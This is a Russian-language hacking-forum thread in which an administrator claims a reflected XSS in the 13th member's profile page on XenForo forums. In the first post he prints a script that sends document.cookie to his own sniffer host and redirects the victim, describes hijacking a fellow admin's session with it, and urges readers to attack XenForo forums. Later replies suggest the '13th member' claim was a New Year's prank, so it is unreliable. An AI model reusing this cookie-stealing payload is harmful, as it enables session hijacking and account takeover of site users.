Информация Предновогодний XSS

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем Антоха, 30 дек 2015.

↑ ↓
Метки:
  1. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.183
    Симпатии:
    11.097
    Пол:
    Мужской
    Репа:
    +11.245 / 47 / -6
    Jabber:
    Skype:
    Решил я перед НГ порыться на нашем форуме в поисках xss-уязвимости...И наткнулся на интересную вещь

    Выяснилось странная закономерность-страница профиля тринадцатого мембера любого ксенфоровского форума содержит пассивную xss.В видео для демонстрации был использован простенький скрипт с алертом
    Код:
    <script>alert('Предновогодний XSS!')</script>
    Но это ведь неинтересно и я решил пойти дальше и захватить кресло верховного главнокомандующего.Вместо скрипта выше вставил боевой скрипт который отсылает куки жертвы на мой сниффер и редиректит бедолагу на другую страничку,дабы тот не прочухал что-то неладное.
    Код:
    <script> img  = new Image(); img.src = "http://мой сниффер/s.gif?"+document.cookie;
    location.href ="http://какая-нибудь страничка на этом форуме/" </script>
    Так как я знал,что X-Shar не ждёт от меня подлости,то не стал заморачиваться с маскировкой,а просто отправил ему линк со скриптом в таком виде.
    После перехода в админке сниффера можно увидеть следующее (на мне в качестве примера):
    xss1.
    Ну и осталось лишь воспользоваться добытыми куками ...
    xss2.
    В честь НГ и нового владельца ресурса все ключники будут реабилитированы и их темы восстановлены.Олег наверное уйдёт на покой,ну или останется здесь управлять серверными делами.
    С наступающим Новым годом!Гоу ломать ксенфорумы,пока дыру не прикрыли.
     
    • Мне нравится Мне нравится x 3
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +967 / 152 / -29
    Jabber:
    Telegram:
    sholoh itsholoh itsholoh itsholoh itsholoh itsholoh itsholoh itsholoh it

    Отписал разработчикам...

    Не хилая такая дыра...NO-no!!!NO-no!!!NO-no!!!

    Теперь не буду по ссылкам переходить и картинки в браузере отключу !sholoh itsholoh itsholoh itsholoh it
     
    • Мне нравится Мне нравится x 2
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +967 / 152 / -29
    Jabber:
    Telegram:
    Ну и как, кто-то искал этого 13-го пользователя ?Dmeh-Smeh-Smeh!!!

    Я всю Новогоднюю ночь проискал эту уязвимость здесь и этого неуловимого триннадцатого пользователя, спасибо Антоха, удружил...sholoh itsholoh itsholoh it
     

Поделиться этой страницей